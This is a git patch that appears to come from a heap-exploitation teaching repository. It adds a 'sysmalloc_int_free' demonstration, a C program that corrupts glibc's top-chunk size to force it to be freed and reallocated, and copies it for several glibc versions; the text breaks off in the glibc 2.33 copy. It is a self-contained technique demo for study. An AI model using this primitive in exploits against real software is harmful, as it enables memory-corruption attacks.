From 4ed6f1954565ed12e23aa84931ed9c36d00a3d8b Mon Sep 17 00:00:00 2001 From: Kyle Zeng Date: Tue, 16 Apr 2024 22:08:01 -0700 Subject: [PATCH 1/3] enable sysmalloc_int_free --- Makefile | 22 ++-- glibc_2.23/sysmalloc_int_free.c | 5 + glibc_2.24/sysmalloc_int_free.c | 180 ++++++++++++++++++++++++++++++++ glibc_2.27/sysmalloc_int_free.c | 3 +- glibc_2.31/sysmalloc_int_free.c | 3 +- glibc_2.32/sysmalloc_int_free.c | 180 ++++++++++++++++++++++++++++++++ glibc_2.33/sysmalloc_int_free.c | 180 ++++++++++++++++++++++++++++++++ glibc_2.34/sysmalloc_int_free.c | 3 +- glibc_2.35/sysmalloc_int_free.c | 180 ++++++++++++++++++++++++++++++++ glibc_2.36/sysmalloc_int_free.c | 180 ++++++++++++++++++++++++++++++++ glibc_2.37/sysmalloc_int_free.c | 180 ++++++++++++++++++++++++++++++++ glibc_2.38/sysmalloc_int_free.c | 180 ++++++++++++++++++++++++++++++++ 12 files changed, 1282 insertions(+), 14 deletions(-) create mode 100644 glibc_2.24/sysmalloc_int_free.c create mode 100644 glibc_2.32/sysmalloc_int_free.c create mode 100644 glibc_2.33/sysmalloc_int_free.c create mode 100644 glibc_2.35/sysmalloc_int_free.c create mode 100644 glibc_2.36/sysmalloc_int_free.c create mode 100644 glibc_2.37/sysmalloc_int_free.c create mode 100644 glibc_2.38/sysmalloc_int_free.c diff --git a/Makefile b/Makefile index 905feaa..7a51557 100644 --- a/Makefile +++ b/Makefile @@ -1,15 +1,15 @@ BASE = malloc_playground first_fit calc_tcache_idx -V2.23 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack house_of_einherjar house_of_force house_of_gods house_of_lore house_of_mind_fastbin house_of_orange house_of_roman house_of_spirit house_of_storm large_bin_attack mmap_overlapping_chunks overlapping_chunks overlapping_chunks_2 poison_null_byte unsafe_unlink unsorted_bin_attack unsorted_bin_into_stack -V2.24 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack house_of_einherjar house_of_force house_of_gods house_of_lore house_of_mind_fastbin house_of_roman house_of_spirit house_of_storm large_bin_attack mmap_overlapping_chunks overlapping_chunks overlapping_chunks_2 poison_null_byte unsafe_unlink unsorted_bin_attack unsorted_bin_into_stack -V2.27 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_force house_of_lore house_of_mind_fastbin house_of_spirit house_of_storm large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink unsorted_bin_attack unsorted_bin_into_stack -V2.31 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink -V2.32 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water -V2.33 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water -V2.34 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water -V2.35 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water -V2.36 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water -V2.37 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water -V2.38 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water +V2.23 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack house_of_einherjar house_of_force house_of_gods house_of_lore house_of_mind_fastbin house_of_orange house_of_roman house_of_spirit house_of_storm large_bin_attack mmap_overlapping_chunks overlapping_chunks overlapping_chunks_2 poison_null_byte unsafe_unlink unsorted_bin_attack unsorted_bin_into_stack sysmalloc_int_free +V2.24 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack house_of_einherjar house_of_force house_of_gods house_of_lore house_of_mind_fastbin house_of_roman house_of_spirit house_of_storm large_bin_attack mmap_overlapping_chunks overlapping_chunks overlapping_chunks_2 poison_null_byte unsafe_unlink unsorted_bin_attack unsorted_bin_into_stack sysmalloc_int_free +V2.27 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_force house_of_lore house_of_mind_fastbin house_of_spirit house_of_storm large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink unsorted_bin_attack unsorted_bin_into_stack sysmalloc_int_free +V2.31 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink sysmalloc_int_free +V2.32 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free +V2.33 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free +V2.34 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free +V2.35 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free +V2.36 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free +V2.37 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free +V2.38 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free # turn technique names into paths VV2.23 = $(addprefix glibc_2.23/, $(V2.23)) diff --git a/glibc_2.23/sysmalloc_int_free.c b/glibc_2.23/sysmalloc_int_free.c index 0d8c055..b1974a2 100644 --- a/glibc_2.23/sysmalloc_int_free.c +++ b/glibc_2.23/sysmalloc_int_free.c @@ -9,6 +9,7 @@ #define SIZE_SZ sizeof(size_t) #define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 #define MALLOC_ALIGN (SIZE_SZ*2) #define MALLOC_MASK (-MALLOC_ALIGN) @@ -27,6 +28,10 @@ /** * Tested on: * + GLIBC 2.23 (x86_64, x86 & aarch64) + * + GLIBC 2.39 (x86_64, x86 & aarch64) + * + GLIBC 2.34 (x86_64, x86 & aarch64) + * + GLIBC 2.31 (x86_64, x86 & aarch64) + * + GLIBC 2.27 (x86_64, x86 & aarch64) * * sysmalloc allows us to free() the top chunk of heap to create nearly arbitrary bins, * which can be used to corrupt heap without needing to call free() directly. diff --git a/glibc_2.24/sysmalloc_int_free.c b/glibc_2.24/sysmalloc_int_free.c new file mode 100644 index 0000000..b1974a2 --- /dev/null +++ b/glibc_2.24/sysmalloc_int_free.c @@ -0,0 +1,180 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN (SIZE_SZ*2) +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// target top chunk size that should be freed +#define CHUNK_FREED_SIZE 0x150 +#define FREED_SIZE (CHUNK_FREED_SIZE-CHUNK_HDR_SZ) + +/** + * Tested on: + * + GLIBC 2.23 (x86_64, x86 & aarch64) + * + GLIBC 2.39 (x86_64, x86 & aarch64) + * + GLIBC 2.34 (x86_64, x86 & aarch64) + * + GLIBC 2.31 (x86_64, x86 & aarch64) + * + GLIBC 2.27 (x86_64, x86 & aarch64) + * + * sysmalloc allows us to free() the top chunk of heap to create nearly arbitrary bins, + * which can be used to corrupt heap without needing to call free() directly. + * This is achieved through sysmalloc calling _int_free to the top_chunk (wilderness), + * if the top_chunk can't be merged during heap growth + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * This technique is used in House of Orange & Tangerine + */ +int main() { + size_t allocated_size, *top_size_ptr, top_size, new_top_size, freed_top_size, *new, *old; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_FREED_SIZE & MALLOC_MASK) == CHUNK_FREED_SIZE); + + puts("Constants:"); + printf("chunk header \t\t= 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align \t\t= 0x%lx\n", MALLOC_ALIGN); + printf("page align \t\t= 0x%lx\n", PAGESIZE); + printf("fencepost size \t\t= 0x%lx\n", FENCEPOST); + printf("freed size \t\t= 0x%lx\n", FREED_SIZE); + + printf("target top chunk size \t= 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_FREED_SIZE); + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + new = malloc(PROBE); + top_size = new[(PROBE / SIZE_SZ) + 1]; + printf("first top size \t\t= 0x%lx\n", top_size); + + // calculate allocated_size + allocated_size = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_FREED_SIZE; + allocated_size &= PAGE_MASK; + allocated_size &= MALLOC_MASK; + + printf("allocated size \t\t= 0x%lx\n\n", allocated_size); + + puts("1. create initial malloc that will be used to corrupt the top_chunk (wilderness)"); + new = malloc(allocated_size); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &new[(allocated_size / SIZE_SZ)-1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("" + "----- %-14p ----\n" + "| NEW | <- initial malloc\n" + "| |\n" + "----- %-14p ----\n" + "| TOP | <- top chunk (wilderness)\n" + "| SIZE (0x%05lx) |\n" + "| ... |\n" + "----- %-14p ---- <- end of current heap page\n\n", + new - 2, + top_size_ptr - 1, + top_size - 1, + top_size_ptr - 1 + (top_size / SIZE_SZ)); + + puts("2. corrupt the size of top chunk to be less, but still page aligned"); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("" + "----- %-14p ----\n" + "| NEW |\n" + "| AAAAAAAAAAAAAAAAAAAAA | <- positive OOB (i.e. BOF)\n" + "----- %-14p ----\n" + "| TOP | <- corrupt size of top chunk (wilderness)\n" + "| SIZE (0x%05lx) |\n" + "----- %-14p ---- <- still page aligned\n" + "| ... |\n" + "----- %-14p ---- <- end of current heap page\n\n", + new - 2, + top_size_ptr - 1, + new_top_size - 1, + top_size_ptr - 1 + (new_top_size / SIZE_SZ), + top_size_ptr - 1 + (top_size / SIZE_SZ)); + + + puts("3. create an allocation larger than the remaining top chunk, to trigger heap growth"); + puts("The now corrupt top_chunk triggers sysmalloc to call _init_free on it"); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_FREED_SIZE); + + old = new; + new = malloc(CHUNK_FREED_SIZE + 0x10); + + printf("" + "----- %-14p ----\n" + "| OLD |\n" + "| AAAAAAAAAAAAAAAAAAAAA |\n" + "----- %-14p ----\n" + "| FREED | <- old top got freed because it couldn't be merged\n" + "| SIZE (0x%05lx) |\n" + "----- %-14p ----\n" + "| FENCEPOST | <- just some architecture depending padding\n" + "----- %-14p ---- <- still page aligned\n" + "| ... |\n" + "----- %-14p ---- <- end of previous heap page\n" + "| NEW | <- new malloc\n" + "-------------------------\n" + "| TOP | <- top chunk (wilderness)\n" + "| ... |\n" + "------------------------- <- end of current heap page\n\n", + old - 2, + top_size_ptr - 1, + freed_top_size, + top_size_ptr - 1 + (CHUNK_FREED_SIZE/SIZE_SZ), + top_size_ptr - 1 + (new_top_size / SIZE_SZ), + new - (MALLOC_ALIGN / SIZE_SZ)); + + puts("...\n"); + + puts("?. reallocated into the freed chunk"); + + old = new; + new = malloc(FREED_SIZE); + + assert((size_t) old > (size_t) new); + + printf("" + "----- %-14p ----\n" + "| NEW | <- allocated into the freed chunk\n" + "| |\n" + "----- %-14p ----\n" + "| ... |\n" + "----- %-14p ---- <- end of previous heap page\n" + "| OLD | <- old malloc\n" + "-------------------------\n" + "| TOP | <- top chunk (wilderness)\n" + "| ... |\n" + "------------------------- <- end of current heap page\n", + new - 2, + top_size_ptr - 1 + (CHUNK_FREED_SIZE / SIZE_SZ), + old - (MALLOC_ALIGN / SIZE_SZ)); +} diff --git a/glibc_2.27/sysmalloc_int_free.c b/glibc_2.27/sysmalloc_int_free.c index f6810f7..b1974a2 100644 --- a/glibc_2.27/sysmalloc_int_free.c +++ b/glibc_2.27/sysmalloc_int_free.c @@ -10,7 +10,7 @@ #define CHUNK_HDR_SZ (SIZE_SZ*2) // same for x86_64 and x86 -#define MALLOC_ALIGN 0x10L +#define MALLOC_ALIGN (SIZE_SZ*2) #define MALLOC_MASK (-MALLOC_ALIGN) #define PAGESIZE sysconf(_SC_PAGESIZE) @@ -27,6 +27,7 @@ /** * Tested on: + * + GLIBC 2.23 (x86_64, x86 & aarch64) * + GLIBC 2.39 (x86_64, x86 & aarch64) * + GLIBC 2.34 (x86_64, x86 & aarch64) * + GLIBC 2.31 (x86_64, x86 & aarch64) diff --git a/glibc_2.31/sysmalloc_int_free.c b/glibc_2.31/sysmalloc_int_free.c index f6810f7..b1974a2 100644 --- a/glibc_2.31/sysmalloc_int_free.c +++ b/glibc_2.31/sysmalloc_int_free.c @@ -10,7 +10,7 @@ #define CHUNK_HDR_SZ (SIZE_SZ*2) // same for x86_64 and x86 -#define MALLOC_ALIGN 0x10L +#define MALLOC_ALIGN (SIZE_SZ*2) #define MALLOC_MASK (-MALLOC_ALIGN) #define PAGESIZE sysconf(_SC_PAGESIZE) @@ -27,6 +27,7 @@ /** * Tested on: + * + GLIBC 2.23 (x86_64, x86 & aarch64) * + GLIBC 2.39 (x86_64, x86 & aarch64) * + GLIBC 2.34 (x86_64, x86 & aarch64) * + GLIBC 2.31 (x86_64, x86 & aarch64) diff --git a/glibc_2.32/sysmalloc_int_free.c b/glibc_2.32/sysmalloc_int_free.c new file mode 100644 index 0000000..b1974a2 --- /dev/null +++ b/glibc_2.32/sysmalloc_int_free.c @@ -0,0 +1,180 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN (SIZE_SZ*2) +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// target top chunk size that should be freed +#define CHUNK_FREED_SIZE 0x150 +#define FREED_SIZE (CHUNK_FREED_SIZE-CHUNK_HDR_SZ) + +/** + * Tested on: + * + GLIBC 2.23 (x86_64, x86 & aarch64) + * + GLIBC 2.39 (x86_64, x86 & aarch64) + * + GLIBC 2.34 (x86_64, x86 & aarch64) + * + GLIBC 2.31 (x86_64, x86 & aarch64) + * + GLIBC 2.27 (x86_64, x86 & aarch64) + * + * sysmalloc allows us to free() the top chunk of heap to create nearly arbitrary bins, + * which can be used to corrupt heap without needing to call free() directly. + * This is achieved through sysmalloc calling _int_free to the top_chunk (wilderness), + * if the top_chunk can't be merged during heap growth + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * This technique is used in House of Orange & Tangerine + */ +int main() { + size_t allocated_size, *top_size_ptr, top_size, new_top_size, freed_top_size, *new, *old; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_FREED_SIZE & MALLOC_MASK) == CHUNK_FREED_SIZE); + + puts("Constants:"); + printf("chunk header \t\t= 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align \t\t= 0x%lx\n", MALLOC_ALIGN); + printf("page align \t\t= 0x%lx\n", PAGESIZE); + printf("fencepost size \t\t= 0x%lx\n", FENCEPOST); + printf("freed size \t\t= 0x%lx\n", FREED_SIZE); + + printf("target top chunk size \t= 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_FREED_SIZE); + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + new = malloc(PROBE); + top_size = new[(PROBE / SIZE_SZ) + 1]; + printf("first top size \t\t= 0x%lx\n", top_size); + + // calculate allocated_size + allocated_size = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_FREED_SIZE; + allocated_size &= PAGE_MASK; + allocated_size &= MALLOC_MASK; + + printf("allocated size \t\t= 0x%lx\n\n", allocated_size); + + puts("1. create initial malloc that will be used to corrupt the top_chunk (wilderness)"); + new = malloc(allocated_size); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &new[(allocated_size / SIZE_SZ)-1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("" + "----- %-14p ----\n" + "| NEW | <- initial malloc\n" + "| |\n" + "----- %-14p ----\n" + "| TOP | <- top chunk (wilderness)\n" + "| SIZE (0x%05lx) |\n" + "| ... |\n" + "----- %-14p ---- <- end of current heap page\n\n", + new - 2, + top_size_ptr - 1, + top_size - 1, + top_size_ptr - 1 + (top_size / SIZE_SZ)); + + puts("2. corrupt the size of top chunk to be less, but still page aligned"); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("" + "----- %-14p ----\n" + "| NEW |\n" + "| AAAAAAAAAAAAAAAAAAAAA | <- positive OOB (i.e. BOF)\n" + "----- %-14p ----\n" + "| TOP | <- corrupt size of top chunk (wilderness)\n" + "| SIZE (0x%05lx) |\n" + "----- %-14p ---- <- still page aligned\n" + "| ... |\n" + "----- %-14p ---- <- end of current heap page\n\n", + new - 2, + top_size_ptr - 1, + new_top_size - 1, + top_size_ptr - 1 + (new_top_size / SIZE_SZ), + top_size_ptr - 1 + (top_size / SIZE_SZ)); + + + puts("3. create an allocation larger than the remaining top chunk, to trigger heap growth"); + puts("The now corrupt top_chunk triggers sysmalloc to call _init_free on it"); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_FREED_SIZE); + + old = new; + new = malloc(CHUNK_FREED_SIZE + 0x10); + + printf("" + "----- %-14p ----\n" + "| OLD |\n" + "| AAAAAAAAAAAAAAAAAAAAA |\n" + "----- %-14p ----\n" + "| FREED | <- old top got freed because it couldn't be merged\n" + "| SIZE (0x%05lx) |\n" + "----- %-14p ----\n" + "| FENCEPOST | <- just some architecture depending padding\n" + "----- %-14p ---- <- still page aligned\n" + "| ... |\n" + "----- %-14p ---- <- end of previous heap page\n" + "| NEW | <- new malloc\n" + "-------------------------\n" + "| TOP | <- top chunk (wilderness)\n" + "| ... |\n" + "------------------------- <- end of current heap page\n\n", + old - 2, + top_size_ptr - 1, + freed_top_size, + top_size_ptr - 1 + (CHUNK_FREED_SIZE/SIZE_SZ), + top_size_ptr - 1 + (new_top_size / SIZE_SZ), + new - (MALLOC_ALIGN / SIZE_SZ)); + + puts("...\n"); + + puts("?. reallocated into the freed chunk"); + + old = new; + new = malloc(FREED_SIZE); + + assert((size_t) old > (size_t) new); + + printf("" + "----- %-14p ----\n" + "| NEW | <- allocated into the freed chunk\n" + "| |\n" + "----- %-14p ----\n" + "| ... |\n" + "----- %-14p ---- <- end of previous heap page\n" + "| OLD | <- old malloc\n" + "-------------------------\n" + "| TOP | <- top chunk (wilderness)\n" + "| ... |\n" + "------------------------- <- end of current heap page\n", + new - 2, + top_size_ptr - 1 + (CHUNK_FREED_SIZE / SIZE_SZ), + old - (MALLOC_ALIGN / SIZE_SZ)); +} diff --git a/glibc_2.33/sysmalloc_int_free.c b/glibc_2.33/sysmalloc_int_free.c new file mode 100644 index 0000000..b1974a2 --- /dev/null +++ b/glibc_2.33/sysmalloc_int_free.c @@ -0,0 +1,180 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN (SIZE_SZ*2) +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// target top chunk size that should be freed +#define CHUNK_FREED_SIZE 0x150 +#define FREED_SIZE (CHUNK_FREED_SIZE-CHUNK_HDR_SZ) + +/** + * Tested on: + * + GLIBC 2.23 (x86_64, x86 & aarch64) + * + GLIBC 2.39 (x86_64, x86 & aarch64) + * + GLIBC 2.34 (x86_64, x86 & aarch64) + * + GLIBC 2.31 (x86_64, x86 & aarch64) + * + GLIBC 2.27 (x86_64, x86 & aarch64) + * + * sysmalloc allows us to free() the top chunk of heap to create nearly arbitrary bins, + * which can be used to corrupt heap without needing to call free() directly. + * This is achieved through sysmalloc calling _int_free to the top_chunk (wilderness), + * if the top_chunk can't be merged during heap growth + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * This technique is used in House of Orange & Tangerine + */ +int main() { + size_t allocated_size, *top_size_ptr, top_size, new_top_size, freed_top_size, *new, *old; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_FREED_SIZE & MALLOC_MASK) == CHUNK_FREED_SIZE); + + puts("Constants:"); + printf("chunk header \t\t= 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align \t\t= 0x%lx\n", MALLOC_ALIGN); + printf("page align \t\t= 0x%lx\n", PAGESIZE); + printf("fencepost size \t\t= 0x%lx\n", FENCEPOST); + printf("freed size \t\t= 0x%lx\n", FREED_SIZE); + + printf("target top chunk size \t= 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_FREED_SIZE); + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + new = malloc(PROBE); + top_size = new[(PROBE / SIZE_SZ) + 1]; + printf("first top size \t\t= 0x%lx\n", top_size); + + // calculate allocated_size + allocated_size = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_FREED_SIZE; + allocated_size &= PAGE_MASK; + allocated_size &= MALLOC_MASK; + + printf("allocated size \t\t= 0x%lx\n\n", allocated_size); + + puts("1. create initial malloc that will be used to corrupt the top_chunk (wilderness)"); + new = malloc(allocated_size); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &new[(allocated_size / SIZE_SZ)-1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("" + "----- %-14p ----\n" + "| NEW | <- initial malloc\n" + "| |\n" + "----- %-14p ----\n" + "| TOP | <- top chunk (wilderness)\n" + "| SIZE (0x%05lx) |\n" + "| ... |\n" + "----- %-14p ---- <- end of current heap page\n\n", + new - 2, + top_size_ptr - 1, + top_size - 1, + top_size_ptr - 1 + (top_size / SIZE_SZ)); + + puts("2. corrupt the size of top chunk to be less, but still page aligned"); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("" + "----- %-14p ----\n" + "| NEW |\n" + "| AAAAAAAAAAAAAAAAAAAAA | <- positive OOB (i.e. BOF)\n" + "----- %-14p ----\n" + "| TOP | <- corrupt size of top chunk (wilderness)\n" + "| SIZE (0x%05lx) |\n" + "----- %-14p ---- <- still page aligned\n" + "| ... |\n" + "----- %-14p ---- <- end of current heap page\n\n", + new - 2, + top_size_ptr - 1, + new_top_size - 1, + top_size_ptr - 1 + (new_top_size / SIZE_SZ), + top_size_ptr - 1 + (top_size / SIZE_SZ)); + + + puts("3. create an allocation larger than the remaining top chunk, to trigger heap growth"); + puts("The now corrupt top_chunk triggers sysmalloc to call _init_free on it"); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_FREED_SIZE); + + old = new; + new = malloc(CHUNK_FREED_SIZE + 0x10); + + printf("" + "----- %-14p ----\n" + "| OLD |\n" + "| AAAAAAAAAAAAAAAAAAAAA |\n" + "----- %-14p 